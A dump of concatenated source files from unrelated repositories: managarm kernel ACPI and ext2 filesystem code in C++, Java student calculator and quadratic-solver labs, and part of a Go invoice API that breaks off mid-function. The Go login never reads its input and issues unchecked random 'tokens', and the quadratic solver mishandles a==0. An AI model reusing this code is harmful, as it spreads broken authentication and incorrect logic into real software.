void AcpiOsReleaseLock(ACPI_SPINLOCK spinlock, ACPI_CPU_FLAGS flags) {
// TODO: implement this
}
// --------------------------------------------------------
// Semaphores
// --------------------------------------------------------
ACPI_STATUS AcpiOsCreateSemaphore(UINT32 max_units, UINT32 initial_units,
ACPI_SEMAPHORE *out_handle) {
auto semaphore = frigg::construct<AcpiSemaphore>(*kernelAlloc);
semaphore->counter = initial_units;
*out_handle = semaphore;
return AE_OK;
}
ACPI_STATUS AcpiOsDeleteSemaphore(ACPI_SEMAPHORE handle) {
NOT_IMPLEMENTED();
return AE_OK;
}
ACPI_STATUS AcpiOsSignalSemaphore(ACPI_SEMAPHORE handle, UINT32 units) {
assert(units == 1);
handle->counter++;
return AE_OK;
}
ACPI_STATUS AcpiOsWaitSemaphore(ACPI_SEMAPHORE handle, UINT32 units, UINT16 timeout) {
assert(units == 1);
assert(handle->counter > 0);
handle->counter--;
return AE_OK;
}
// --------------------------------------------------------
// Physical memory access
// --------------------------------------------------------
void *AcpiOsMapMemory(ACPI_PHYSICAL_ADDRESS physical, ACPI_SIZE length) {
auto paddr = physical & ~(kPageSize - 1);
auto vsize = length + (physical & (kPageSize - 1));
assert(vsize <= 0x100000);
auto ptr = KernelVirtualMemory::global().allocate(0x100000);
for(size_t pg = 0; pg < vsize; pg += kPageSize)
KernelPageSpace::global().mapSingle4k((VirtualAddr)ptr + pg, paddr + pg,
page_access::write, CachingMode::null);
return reinterpret_cast<char *>(ptr) + (physical & (kPageSize - 1));
}
void AcpiOsUnmapMemory(void *pointer, ACPI_SIZE length) {
auto vaddr = (uintptr_t)pointer & ~(kPageSize - 1);
auto vsize = length + ((uintptr_t)pointer & (kPageSize - 1));
assert(vsize <= 0x100000);
for(size_t pg = 0; pg < vsize; pg += kPageSize)
KernelPageSpace::global().unmapSingle4k(vaddr + pg);
//TODO: KernelVirtualMemory::global().free(pointer);
}
// --------------------------------------------------------
// Memory management
// --------------------------------------------------------
void *AcpiOsAllocate(ACPI_SIZE size) {
return kernelAlloc->allocate(size);
}
void AcpiOsFree(void *pointer) {
kernelAlloc->free(pointer);
}
// --------------------------------------------------------
// Interrupts
// --------------------------------------------------------
namespace {
struct AcpiSink : IrqSink {
AcpiSink(ACPI_OSD_HANDLER handler, void *context)
: IrqSink{frigg::String<KernelAlloc>{*kernelAlloc, "acpi-sci"}},
_handler{handler}, _context{context} { }
IrqStatus raise() override {
auto report = [] (unsigned int event, const char *name) {
ACPI_EVENT_STATUS status;
AcpiGetEventStatus(event, &status);
const char *enabled = (status & ACPI_EVENT_FLAG_ENABLED) ? "enabled" : "disabled";
const char *set = (status & ACPI_EVENT_FLAG_SET) ? "set" : "clear";
frigg::infoLogger() << " " << name << ": " << enabled
<< " " << set << frigg::endLog;
};
if(logEverySci) {
frigg::infoLogger() << "thor: Handling ACPI interrupt." << frigg::endLog;
report(ACPI_EVENT_PMTIMER, "ACPI timer");
report(ACPI_EVENT_GLOBAL, "Global lock");
report(ACPI_EVENT_POWER_BUTTON, "Power button");
report(ACPI_EVENT_SLEEP_BUTTON, "Sleep button");
report(ACPI_EVENT_RTC, "RTC");
}
auto result = _handler(_context);
if(result == ACPI_INTERRUPT_HANDLED) {
return IrqStatus::acked;
}else{
assert(result == ACPI_INTERRUPT_NOT_HANDLED);
return IrqStatus::nacked;
}
}
private:
ACPI_OSD_HANDLER _handler;
void *_context;
};
}
ACPI_STATUS AcpiOsInstallInterruptHandler(UINT32 number,
ACPI_OSD_HANDLER handler, void *context) {
frigg::infoLogger() << "thor: Installing handler for ACPI IRQ " << number << frigg::endLog;
auto sink = frigg::construct<AcpiSink>(*kernelAlloc, handler, context);
auto pin = getGlobalSystemIrq(number);
IrqPin::attachSink(pin, sink);
// There are mainboards that raise the SCI before we actually enable it.
// This is a problem if the SCI is level-triggered and we mask it because
// there is no handler attached. Kick the IRQ so that it gets unmasked again.
IrqPin::kickSink(sink);
return AE_OK;
}
ACPI_STATUS AcpiOsRemoveInterruptHandler(UINT32 interrupt,
ACPI_OSD_HANDLER handler) {
NOT_IMPLEMENTED();
}
// --------------------------------------------------------
// Threads
// --------------------------------------------------------
ACPI_THREAD_ID AcpiOsGetThreadId() {
return 1;
}
void AcpiOsSleep(UINT64 milliseconds) {
NOT_IMPLEMENTED();
}
void AcpiOsStall(UINT32 milliseconds) {
NOT_IMPLEMENTED();
}
UINT64 AcpiOsGetTimer() {
NOT_IMPLEMENTED();
}
ACPI_STATUS AcpiOsSignal(UINT32 function, void *info) {
NOT_IMPLEMENTED();
}
// --------------------------------------------------------
// Async execution
// --------------------------------------------------------
ACPI_STATUS AcpiOsExecute(ACPI_EXECUTE_TYPE type,
ACPI_OSD_EXEC_CALLBACK function, void *context) {
NOT_IMPLEMENTED();
}
void AcpiOsWaitEventsComplete() {
NOT_IMPLEMENTED();
}
// --------------------------------------------------------
// Hardware access
// --------------------------------------------------------
ACPI_STATUS AcpiOsReadMemory(ACPI_PHYSICAL_ADDRESS address,
UINT64 *value, UINT32 width) {
NOT_IMPLEMENTED();
}
ACPI_STATUS AcpiOsWriteMemory(ACPI_PHYSICAL_ADDRESS address,
UINT64 value, UINT32 width) {
NOT_IMPLEMENTED();
}
ACPI_STATUS AcpiOsReadPort(ACPI_IO_ADDRESS address, UINT32 *value, UINT32 width) {
if(width == 8) {
// read the I/O port
uint16_t port = address;
uint8_t result;
asm volatile ( "inb %1, %0" : "=a"(result) : "d"(port) );
*value = result;
}else if(width == 16) {
// read the I/O port
uint16_t port = address;
uint16_t result;
asm volatile ( "inw %1, %0" : "=a"(result) : "d"(port) );
*value = result;
}else if(width == 32) {
// read the I/O port
uint16_t port = address;
uint32_t result;
asm volatile ( "inl %1, %0" : "=a"(result) : "d"(port) );
*value = result;
}else{
assert(!"Unexpected bit width for AcpiOsReadPort()");
}
return AE_OK;
}
ACPI_STATUS AcpiOsWritePort(ACPI_IO_ADDRESS address, UINT32 value, UINT32 width) {
if(width == 8) {
// read the I/O port
uint16_t port = address;
uint8_t to_write = value;
asm volatile ( "outb %0, %1" : : "a"(to_write), "d"(port) );
}else if(width == 16) {
// read the I/O port
uint16_t port = address;
uint16_t to_write = value;
asm volatile ( "outw %0, %1" : : "a"(to_write), "d"(port) );
}else if(width == 32) {
// read the I/O port
uint16_t port = address;
uint32_t to_write = value;
asm volatile ( "outl %0, %1" : : "a"(to_write), "d"(port) );
}else{
assert(!"Unexpected bit width for AcpiOsWritePort()");
}
return AE_OK;
}
ACPI_STATUS AcpiOsReadPciConfiguration(ACPI_PCI_ID *target, UINT32 offset,
UINT64 *value, UINT32 width) {
/* std::cout << "segment: " << target->Segment
<< ", bus: " << target->Bus
<< ", slot: " << target->Device
<< ", function: " << target->Function << std::endl;*/
assert(!target->Segment);
switch(width) {
case 8:
*value = readPciByte(target->Bus, target->Device, target->Function, offset);
break;
case 16:
*value = readPciHalf(target->Bus, target->Device, target->Function, offset);
break;
case 32:
*value = readPciWord(target->Bus, target->Device, target->Function, offset);
break;
default:
frigg::panicLogger() << "Unexpected PCI access width" << frigg::endLog;
}
return AE_OK;
}
ACPI_STATUS AcpiOsWritePciConfiguration(ACPI_PCI_ID *target, UINT32 offset,
UINT64 value, UINT32 width) {
assert(!target->Segment);
switch(width) {
case 8:
writePciByte(target->Bus, target->Device, target->Function, offset, value);
break;
case 16:
writePciHalf(target->Bus, target->Device, target->Function, offset, value);
break;
case 32:
writePciWord(target->Bus, target->Device, target->Function, offset, value);
break;
default:
frigg::panicLogger() << "Unexpected PCI access width" << frigg::endLog;
}
return AE_OK;
}
// --------------------------------------------------------
// Table / object override
// --------------------------------------------------------
ACPI_STATUS AcpiOsPredefinedOverride(const ACPI_PREDEFINED_NAMES *predefined,
ACPI_STRING *new_value) {
*new_value = nullptr;
return AE_OK;
}
ACPI_STATUS AcpiOsTableOverride(ACPI_TABLE_HEADER *existing,
ACPI_TABLE_HEADER **new_table) {
*new_table = nullptr;
return AE_OK;
}
ACPI_STATUS AcpiOsPhysicalTableOverride(ACPI_TABLE_HEADER *existing,
ACPI_PHYSICAL_ADDRESS *new_address, UINT32 *new_length) {
*new_address = 0;
return AE_OK;
}
<file_sep>
namespace thor {
namespace acpi {
void initializeBasicSystem();
void initializeExtendedSystem();
} } // namespace thor::acpi
<file_sep># The managarm Operating System

## What is this about?
This is the main repository of managarm, a microkernel-based operating system.
**What is special about managarm?** Some notable properties of managarm are:
(i) managarm is based on a microkernel while common Desktop operating systems like Linux and Windows use monolithic kernels,
(ii) managarm uses a completely asynchronous API for I/O
and (iii) despite those internal differences, managarm provides good compatibility with Linux at the user space level.
**Aren't microkernels slow?** Microkernels do have some performance disadvantages over monolithic kernels.
managarm tries to mitigate some of those issues by providing good abstractions (at the driver and system call levels)
that allow efficient implementations of common user space functionality (like POSIX).
**Is this a Linux distribution?** No, managarm runs its own kernel that does not originate from Linux.
While the managarm user space API supports many Linux APIs (e.g. epoll, timerfd, signalfd or tmpfs),
managarm does not share any source code (or binaries) with the Linux kernel.
## Supported Software
Currently, Weston (the Wayland reference compositor) and GNU Bash run on managarm.
## Supported Hardware
**General** USB (UHCI, EHCI)\
**Graphics** Generic VBE graphics, Intel G45, virtio GPU, Bochs VBE interface\
**Input** USB human interface devices, PS/2 keyboard and mouse\
**Storage** USB mass storage devices, ATA, virtio block
## Building managarm
While this repository contains managarm's kernel, its drivers and other core functionality,
it is not enough to build a full managarm distribution. Instead, we refer to the
[bootstrap-managarm](https://github.com/managarm/bootstrap-managarm) repository for build instructions.
<file_sep>
#include <stdio.h>
#include <string.h>
#include <iostream>
#include <helix/ipc.hpp>
#include <helix/await.hpp>
#include <protocols/fs/server.hpp>
#include <protocols/mbus/client.hpp>
#include <blockfs.hpp>
#include "gpt.hpp"
#include "ext2fs.hpp"
#include "fs.pb.h"
namespace blockfs {
// TODO: Support more than one table.
gpt::Table *table;
ext2fs::FileSystem *fs;
namespace {
COFIBER_ROUTINE(async::result<protocols::fs::SeekResult>, seekAbs(void *object,
int64_t offset), ([=] {
auto self = static_cast<ext2fs::OpenFile *>(object);
self->offset = offset;
COFIBER_RETURN(self->offset);
}))
COFIBER_ROUTINE(async::result<protocols::fs::SeekResult>, seekRel(void *object,
int64_t offset), ([=] {
auto self = static_cast<ext2fs::OpenFile *>(object);
self->offset += offset;
COFIBER_RETURN(self->offset);
}))
COFIBER_ROUTINE(async::result<protocols::fs::ReadResult>, read(void *object, const char *,
void *buffer, size_t length), ([=] {
assert(length);
auto self = static_cast<ext2fs::OpenFile *>(object);
COFIBER_AWAIT self->inode->readyJump.async_wait();
assert(self->offset <= self->inode->fileSize());
auto remaining = self->inode->fileSize() - self->offset;
auto chunk_size = std::min(length, remaining);
if(!chunk_size)
COFIBER_RETURN(0); // TODO: Return an explicit end-of-file error?
auto chunk_offset = self->offset;
auto map_offset = chunk_offset & ~size_t(0xFFF);
auto map_size = ((chunk_offset + chunk_size) & ~size_t(0xFFF)) - map_offset + 0x1000;
self->offset += chunk_size;
helix::LockMemoryView lock_memory;
auto &&submit = helix::submitLockMemoryView(helix::BorrowedDescriptor(self->inode->frontalMemory),
&lock_memory, map_offset, map_size, helix::Dispatcher::global());
COFIBER_AWAIT(submit.async_wait());
HEL_CHECK(lock_memory.error());
// Map the page cache into the address space.
helix::Mapping file_map{helix::BorrowedDescriptor{self->inode->frontalMemory},
map_offset, map_size,
kHelMapProtRead | kHelMapDontRequireBacking};
memcpy(buffer, reinterpret_cast<char *>(file_map.get()) + (chunk_offset - map_offset),
chunk_size);
COFIBER_RETURN(chunk_size);
}))
COFIBER_ROUTINE(async::result<void>, write(void *object, const char *,
const void *buffer, size_t length), ([=] {
assert(length);
auto self = static_cast<ext2fs::OpenFile *>(object);
COFIBER_AWAIT self->inode->fs.write(self->inode.get(), self->offset, buffer, length);
self->offset += length;
}))
COFIBER_ROUTINE(async::result<protocols::fs::AccessMemoryResult>,
accessMemory(void *object, uint64_t offset, size_t size), ([=] {
auto self = static_cast<ext2fs::OpenFile *>(object);
COFIBER_AWAIT self->inode->readyJump.async_wait();
assert(offset + size <= self->inode->fileSize());
COFIBER_RETURN(std::make_pair(helix::BorrowedDescriptor{self->inode->frontalMemory}, offset));
}))
COFIBER_ROUTINE(async::result<protocols::fs::ReadEntriesResult>,
readEntries(void *object), ([=] {
auto self = static_cast<ext2fs::OpenFile *>(object);
COFIBER_RETURN(COFIBER_AWAIT self->readEntries());
}))
constexpr auto fileOperations = protocols::fs::FileOperations{}
.withSeekAbs(&seekAbs)
.withSeekRel(&seekRel)
.withRead(&read)
.withWrite(&write)
.withReadEntries(&readEntries)
.withAccessMemory(&accessMemory);
COFIBER_ROUTINE(async::result<protocols::fs::GetLinkResult>, getLink(std::shared_ptr<void> object,
std::string name), ([=] {
auto self = std::static_pointer_cast<ext2fs::Inode>(object);
auto entry = COFIBER_AWAIT self->findEntry(name);
if(!entry)
COFIBER_RETURN((protocols::fs::GetLinkResult{nullptr, -1,
protocols::fs::FileType::unknown}));
protocols::fs::FileType type;
switch(entry->fileType) {
case kTypeDirectory:
type = protocols::fs::FileType::directory;
break;
case kTypeRegular:
type = protocols::fs::FileType::regular;
break;
case kTypeSymlink:
type = protocols::fs::FileType::symlink;
break;
default:
throw std::runtime_error("Unexpected file type");
}
assert(entry->inode);
COFIBER_RETURN((protocols::fs::GetLinkResult{fs->accessInode(entry->inode), entry->inode, type}));
}))
COFIBER_ROUTINE(async::result<protocols::fs::GetLinkResult>, link(std::shared_ptr<void> object,
std::string name, int64_t ino), ([=] {
auto self = std::static_pointer_cast<ext2fs::Inode>(object);
auto entry = COFIBER_AWAIT self->link(std::move(name), ino);
if(!entry)
COFIBER_RETURN((protocols::fs::GetLinkResult{nullptr, -1,
protocols::fs::FileType::unknown}));
protocols::fs::FileType type;
switch(entry->fileType) {
case kTypeDirectory:
type = protocols::fs::FileType::directory;
break;
case kTypeRegular:
type = protocols::fs::FileType::regular;
break;
case kTypeSymlink:
type = protocols::fs::FileType::symlink;
break;
default:
throw std::runtime_error("Unexpected file type");
}
assert(entry->inode);
COFIBER_RETURN((protocols::fs::GetLinkResult{fs->accessInode(entry->inode), entry->inode, type}));
}))
COFIBER_ROUTINE(async::result<void>, unlink(std::shared_ptr<void> object,
std::string name), ([=] {
auto self = std::static_pointer_cast<ext2fs::Inode>(object);
COFIBER_AWAIT self->unlink(std::move(name));
}))
COFIBER_ROUTINE(cofiber::no_future, serve(smarter::shared_ptr<ext2fs::OpenFile> file,
helix::UniqueLane local_ctrl_, helix::UniqueLane local_pt_),
([file, local_ctrl = std::move(local_ctrl_), local_pt = std::move(local_pt_)] () mutable {
async::cancellation_event cancel_pt;
// Cancel the passthrough lane once the file line is closed.
async::detach(protocols::fs::serveFile(std::move(local_ctrl),
file.get(), &fileOperations), [&] {
cancel_pt.cancel();
});
COFIBER_AWAIT protocols::fs::servePassthrough(std::move(local_pt),
file, &fileOperations, cancel_pt);
}))
COFIBER_ROUTINE(async::result<protocols::fs::FileStats>,
getStats(std::shared_ptr<void> object), ([=] {
auto self = std::static_pointer_cast<ext2fs::Inode>(object);
COFIBER_AWAIT self->readyJump.async_wait();
protocols::fs::FileStats stats;
stats.linkCount = self->numLinks;
stats.fileSize = self->fileSize();
stats.mode = self->mode;
stats.uid = self->uid;
stats.gid = self->gid;
stats.accessTime = self->accessTime;
stats.dataModifyTime = self->dataModifyTime;
stats.anyChangeTime = self->anyChangeTime;
COFIBER_RETURN(stats);
}))
COFIBER_ROUTINE(async::result<protocols::fs::OpenResult>,
open(std::shared_ptr<void> object), ([=] {
auto self = std::static_pointer_cast<ext2fs::Inode>(object);
auto file = smarter::make_shared<ext2fs::OpenFile>(self);
helix::UniqueLane local_ctrl, remote_ctrl;
helix::UniqueLane local_pt, remote_pt;
std::tie(local_ctrl, remote_ctrl) = helix::createStream();
std::tie(local_pt, remote_pt) = helix::createStream();
serve(file, std::move(local_ctrl), std::move(local_pt));
COFIBER_RETURN(protocols::fs::OpenResult(std::move(remote_ctrl), std::move(remote_pt)));
}))
COFIBER_ROUTINE(async::result<std::string>, readSymlink(std::shared_ptr<void> object), ([=] {
auto self = std::static_pointer_cast<ext2fs::Inode>(object);
COFIBER_AWAIT self->readyJump.async_wait();
assert(self->fileSize() <= 60);
std::string link(self->fileData.embedded, self->fileData.embedded + self->fileSize());
COFIBER_RETURN(link);
}))
constexpr protocols::fs::NodeOperations nodeOperations{
&getStats,
&getLink,
&link,
&unlink,
&open,
&readSymlink
};
} // anonymous namespace
BlockDevice::BlockDevice(size_t sector_size)
: sectorSize(sector_size) { }
COFIBER_ROUTINE(cofiber::no_future, servePartition(helix::UniqueLane p),
([lane = std::move(p)] {
std::cout << "unix device: Connection" << std::endl;
while(true) {
helix::Accept accept;
helix::RecvInline recv_req;
auto &&header = helix::submitAsync(lane, helix::Dispatcher::global(),
helix::action(&accept, kHelItemAncillary),
helix::action(&recv_req));
COFIBER_AWAIT header.async_wait();
HEL_CHECK(accept.error());
HEL_CHECK(recv_req.error());
auto conversation = accept.descriptor();
managarm::fs::CntRequest req;
req.ParseFromArray(recv_req.data(), recv_req.length());
if(req.req_type() == managarm::fs::CntReqType::DEV_MOUNT) {
helix::SendBuffer send_resp;
helix::PushDescriptor push_node;
helix::UniqueLane local_lane, remote_lane;
std::tie(local_lane, remote_lane) = helix::createStream();
protocols::fs::serveNode(std::move(local_lane), fs->accessRoot(),
&nodeOperations);
managarm::fs::SvrResponse resp;
resp.set_error(managarm::fs::Errors::SUCCESS);
auto ser = resp.SerializeAsString();
auto &&transmit = helix::submitAsync(conversation, helix::Dispatcher::global(),
helix::action(&send_resp, ser.data(), ser.size(), kHelItemChain),
helix::action(&push_node, remote_lane));
COFIBER_AWAIT transmit.async_wait();
HEL_CHECK(send_resp.error());
HEL_CHECK(push_node.error());
}else if(req.req_type() == managarm::fs::CntReqType::SB_CREATE_REGULAR) {
helix::SendBuffer send_resp;
helix::PushDescriptor push_node;
auto inode = COFIBER_AWAIT fs->createRegular();
helix::UniqueLane local_lane, remote_lane;
std::tie(local_lane, remote_lane) = helix::createStream();
protocols::fs::serveNode(std::move(local_lane),
inode, &nodeOperations);
managarm::fs::SvrResponse resp;
resp.set_error(managarm::fs::Errors::SUCCESS);
resp.set_id(inode->number);
resp.set_file_type(managarm::fs::FileType::REGULAR);
auto ser = resp.SerializeAsString();
auto &&transmit = helix::submitAsync(conversation, helix::Dispatcher::global(),
helix::action(&send_resp, ser.data(), ser.size(), kHelItemChain),
helix::action(&push_node, remote_lane));
COFIBER_AWAIT transmit.async_wait();
HEL_CHECK(send_resp.error());
HEL_CHECK(push_node.error());
}else{
throw std::runtime_error("Unexpected request type");
}
}
}))
COFIBER_ROUTINE(cofiber::no_future, runDevice(BlockDevice *device), ([=] {
table = new gpt::Table(device);
COFIBER_AWAIT table->parse();
for(size_t i = 0; i < table->numPartitions(); ++i) {
auto type = table->getPartition(i).type();
printf("Partition %lu, type: %.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X\n",
i, type.a, type.b, type.c, type.d[0], type.d[1],
type.e[0], type.e[1], type.e[2], type.e[3], type.e[4], type.e[5]);
if(type != gpt::type_guids::windowsData)
continue;
printf("It's a Windows data partition!\n");
fs = new ext2fs::FileSystem(&table->getPartition(i));
COFIBER_AWAIT fs->init();
printf("ext2fs is ready!\n");
// Create an mbus object for the partition.
auto root = COFIBER_AWAIT mbus::Instance::global().getRoot();
mbus::Properties descriptor{
{"unix.devtype", mbus::StringItem{"block"}},
{"unix.devname", mbus::StringItem{"sda0"}}
};
auto handler = mbus::ObjectHandler{}
.withBind([] () -> async::result<helix::UniqueDescriptor> {
helix::UniqueLane local_lane, remote_lane;
std::tie(local_lane, remote_lane) = helix::createStream();
servePartition(std::move(local_lane));
async::promise<helix::UniqueDescriptor> promise;
promise.set_value(std::move(remote_lane));
return promise.async_get();
});
COFIBER_AWAIT root.createObject("partition", descriptor, std::move(handler));
}
}))
} // namespace blockfs
| 659b155330fe9ca4e93211f774d043f1a7fbe222 | [
"Markdown",
"C++"
] | 25 | C++ | souravbadami/managarm | 96275b1b16593ea6ba75b83edfb5f7b736ce02a7 | 90187562ad132dfe322d17514dbd879689fc0791 |
refs/heads/master | <file_sep>/*
* To change this license header, choose License Headers in Project Properties.
* To change this template file, choose Tools | Templates
* and open the template in the editor.
*/
package lab3;
import java.util.Scanner;
/**
*
* @author Admin
*/
public class GiaiPTB2
{
float a,b,c;
double delta;
float x1,x2;
boolean conghiem = false;
public GiaiPTB2(float a,float b,float c){
this.a=a;
this.b=b;
this.c=c;
}
String Giai(){
String sResult="";
if(a==0)//phương trình bậc nhất
{
if(b==0)
{
if(c==0)
sResult="Phương trình vô số nghiệm.";
else //c!=0
sResult="Phương trình vô nghiệm.";
}
else //b!=0 //Bx = -C
{
x1 = x2 = -c/b;
conghiem = true;
}
}
// truong hop a!=0
//Phương trình bậc hai
delta = TinhDelta();
if(delta <0)
sResult="Phương trình vô nghiệm.";
else
{
if(delta == 0)
{
x1 = x2 = -b/(2*a);
conghiem = true;
sResult="Nghiệm x1=x2=" + x1;
}
else
{
x1 = (float)((-b + Math.sqrt(delta))/(2*a));
x2 = (float)((-b - Math.sqrt(delta))/(2*a));
conghiem = true;
sResult="Nghiệm x1=" + x1 + ", x2=" + x2;
}
}
return sResult;
}
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
double TinhDelta()
{
return (b*b - 4*a*c);
}
}
<file_sep>/*
* To change this license header, choose License Headers in Project Properties.
* To change this template file, choose Tools | Templates
* and open the template in the editor.
*/
package lab3;
import java.awt.Container;
import java.awt.FlowLayout;
import java.awt.Font;
import java.awt.event.ActionEvent;
import java.awt.event.ActionListener;
import javax.swing.JButton;
import javax.swing.JFrame;
import javax.swing.JLabel;
import javax.swing.JOptionPane;
import javax.swing.JPanel;
import javax.swing.JTextField;
/**
*
* @author Administrator
*/
public class Bai6 extends JFrame implements ActionListener{
static JButton btnAdd,btnSub,btnMul,btnDiv;
static JTextField tfNum1,tfNum2,tfResult;
public Bai6(){
setTitle("Caculator");
setLayout(null);
setDefaultCloseOperation(EXIT_ON_CLOSE);
setResizable(false);
Container con=getContentPane();
JLabel lbnum1=new JLabel("First num:");
lbnum1.setBounds(30, 30, 100, 30);
con.add(lbnum1);
tfNum1=new JTextField();
tfNum1.setBounds(150, 30, 200, 30);
con.add(tfNum1);
JLabel lbnum2=new JLabel("Second num:");
lbnum2.setBounds(30, 90, 100, 30);
con.add(lbnum2);
tfNum2=new JTextField();
tfNum2.setBounds(150, 90, 200, 30);
con.add(tfNum2);
JLabel lbResult=new JLabel("Result:");
lbResult.setBounds(30, 150, 100, 30);
con.add(lbResult);
tfResult=new JTextField();
tfResult.setBounds(150, 150, 200, 30);
tfResult.setEditable(false);
con.add(tfResult);
int x=60;
Font font=new Font("Times New Roman",Font.BOLD,20);
btnAdd=new JButton("+");
btnAdd.setFont(font);
btnAdd.setBounds(x, 210, 50, 50);
btnAdd.addActionListener(this);
con.add(btnAdd);
btnSub=new JButton("-");
btnSub.setFont(font);
btnSub.setBounds(x+70, 210, 50, 50);
btnSub.addActionListener(this);
con.add(btnSub);
btnMul=new JButton("*");
btnMul.setFont(font);
btnMul.setBounds(x+140, 210, 50, 50);
btnMul.addActionListener(this);
con.add(btnMul);
btnDiv=new JButton("/");
btnDiv.setFont(font);
btnDiv.setBounds(x+210, 210, 50, 50);
btnDiv.addActionListener(this);
con.add(btnDiv);
}
public static void main(String[] args) {
Bai6 bai6 = new Bai6();
bai6.setBounds(200, 200, 400, 350);
bai6.setVisible(true);
}
boolean CheckInputIsNumber(String t){
try{
int x=Integer.parseInt(t);
return true;
}catch(Exception e){
return false;
}
}
@Override
public void actionPerformed(ActionEvent e) {
float a=0,b=0,c=0;
if(!CheckInputIsNumber(new String(tfNum1.getText()))||!CheckInputIsNumber(new String(tfNum2.getText()))){
this.tfNum2.setText("");
this.tfNum1.setText("");
this.tfNum1.requestFocus();
JOptionPane.showMessageDialog(this,"Nhập sai giá trị! phải nhập số mới tính được","Lỗi", JOptionPane.ERROR_MESSAGE);
return;
}
if(e.getSource()==btnAdd){
a=Integer.parseInt(tfNum1.getText());
b=Integer.parseInt(tfNum2.getText());
c=a+b;
this.tfResult.setText(String.valueOf(c));
}
if(e.getSource()==btnSub){
a=Integer.parseInt(tfNum1.getText());
b=Integer.parseInt(tfNum2.getText());
c=a-b;
this.tfResult.setText(String.valueOf(c));
}
if(e.getSource()==btnMul){
a=Integer.parseInt(tfNum1.getText());
b=Integer.parseInt(tfNum2.getText());
c=a*b;
this.tfResult.setText(String.valueOf(c));
}
if(e.getSource()==btnDiv){
a=Integer.parseInt(tfNum1.getText());
b=Integer.parseInt(tfNum2.getText());
if(b==0){
this.tfNum2.setText("");
this.tfNum1.setText("");
this.tfNum1.requestFocus();
JOptionPane.showMessageDialog(this,"Số bị chia không được bằng 0 (second num=0). Nhập lại đê bạn ơi!","Lỗi", JOptionPane.ERROR_MESSAGE);
return;
}
c=a/b;
this.tfResult.setText(String.valueOf(c));
}
}
}
| f34439aea9c6192ba49324bcd56c5dae5bd0e630 | [
"Java"
] | 2 | Java | Ariztyno/CongCuMoiTruongPhatTrienPhanMem_LAB4 | af4af5466d6b45fe69606d53caf6f95ecce9d850 | c0b8a3c4d7c59f37edc5220c85d21844339a4e27 |
refs/heads/master | <repo_name>cyantarek/go-vue-invoice-app<file_sep>/backend/handlers.go
package main
import (
"fmt"
"github.com/gin-gonic/gin"
"github.com/google/uuid"
"golang.org/x/crypto/bcrypt"
"gopkg.in/mgo.v2/bson"
"log"
"net/http"
)
// Controllers
func Register(c *gin.Context) {
var newUser User
_ = c.Bind(&newUser)
if newUser.Name == "" || newUser.Email == "" || newUser.CompanyName == "" || newUser.Password == "" {
c.JSON(http.StatusBadRequest, gin.H{"msg": "All fields are required"})
return
}
hashedPassword, err := bcrypt.GenerateFromPassword([]byte(newUser.Password), bcrypt.DefaultCost)
if err != nil {
c.JSON(http.StatusInternalServerError, nil)
}
newUser.Password = string(<PASSWORD>)
newUser.ID = bson.NewObjectId()
_ = db.C("users").Insert(&newUser)
c.JSON(200, gin.H{"token": uuid.New(), "user": newUser, "status": true})
}
func Login(c *gin.Context) {
payload := struct {
Email string `json:"email"`
Password string `json:"password"`
}{}
if payload.Email == "" && payload.Password == "" {
c.JSON(http.StatusInternalServerError, gin.H{"error": "All fields are required"})
return
}
var user User
err := db.C("users").Find(bson.M{"email": payload.Email}).One(&user)
if err != nil {
c.JSON(http.StatusInternalServerError, gin.H{"error": "User not found"})
return
}
if err := bcrypt.CompareHashAndPassword([]byte(user.Password), []byte(payload.Password)); err != nil {
fmt.Println(err.Error())
c.JSON(http.StatusInternalServerError, gin.H{"error": "Password not match"})
return
}
c.JSON(http.StatusOK, gin.H{"token": uuid.New(), "user": user})
}
func CreateInvoice(c *gin.Context) {
payload := struct {
Name string `json:"name"`
Transactions []struct {
ID bson.ObjectId `bson:"_id"`
Name string `json:"name"`
InvoiceID string `json:"invoice_id" bson:"invoice_id"`
Price int `json:"price"`
} `json:"transactions"`
UserID string `json:"user_id"`
}{}
_ = c.BindJSON(&payload)
if payload.Name == "" {
c.JSON(http.StatusBadRequest, gin.H{"msg": "All fields are required"})
return
}
var invoice Invoice
invoice.ID = bson.NewObjectId()
invoice.Name = payload.Name
invoice.UserID = payload.UserID
_ = db.C("invoices").Insert(&invoice)
for _, v := range payload.Transactions {
v.ID = bson.NewObjectId()
v.InvoiceID = invoice.ID.Hex()
_ = db.C("transactions").Insert(&v)
}
}
func GetAllInvoiceOfAUser(c *gin.Context) {
var invoices []Invoice
err := db.C("invoices").Find(bson.M{"user_id": bson.M{"$eq": c.Param("userId")}}).All(&invoices)
if err != nil {
log.Println(err)
}
c.JSON(200, gin.H{"status": true, "user_id": c.Param("userId"), "invoices": invoices})
}
func GetOneInvoiceOfAUser(c *gin.Context) {
var invoice Invoice
andQuery := bson.M{"$and": []bson.M{{"user_id": c.Param("userId")}, {"_id": bson.ObjectIdHex(c.Param("invoiceId"))}}}
err := db.C("invoices").Find(andQuery).One(&invoice)
if err != nil {
log.Println(err)
}
var transactions []Transaction
err = db.C("transactions").Find(bson.M{"invoice_id": bson.M{"$eq": invoice.ID.Hex()}}).All(&transactions)
if err != nil {
log.Println(err)
}
c.JSON(200, gin.H{"status": true, "invoice_id": invoice.ID, "user_id": c.Param("userId"), "transactions": transactions, "paid": invoice.Paid})
}
<file_sep>/README.md
# Go Vue Invoice App
<file_sep>/backend/models.go
package main
import (
"gopkg.in/mgo.v2/bson"
)
// Models
type User struct {
ID bson.ObjectId `json:"id" bson:"_id"`
Name string `json:"name"`
Email string `json:"email"`
CompanyName string `json:"company_name" bson:"company_name"`
Password string `json:"-"`
}
type Invoice struct {
ID bson.ObjectId `json:"id" bson:"_id"`
Name string `json:"name"`
Paid bool `json:"paid"`
UserID string `json:"user_id" bson:"user_id"`
}
type Transaction struct {
ID bson.ObjectId `json:"id" bson:"_id"`
Name string `json:"name"`
Price float32 `json:"price"`
InvoiceID string `json:"invoice_id" bson:"invoice_id"`
}
<file_sep>/backend/main.go
package main
import (
"github.com/gin-contrib/cors"
"github.com/gin-gonic/gin"
"gopkg.in/mgo.v2"
"log"
)
var db *mgo.Database
func main() {
app := gin.Default()
app.Use(cors.New(cors.Config{
AllowMethods: []string{"GET", "POST", "OPTIONS", "PUT"},
AllowHeaders: []string{"Origin", "Content-Length", "Content-Type", "User-Agent", "Referrer", "Host", "Token"},
ExposeHeaders: []string{"Content-Length"},
AllowCredentials: true,
AllowAllOrigins: true,
MaxAge: 86400,
}))
session, err := mgo.Dial("mongodb://localhost")
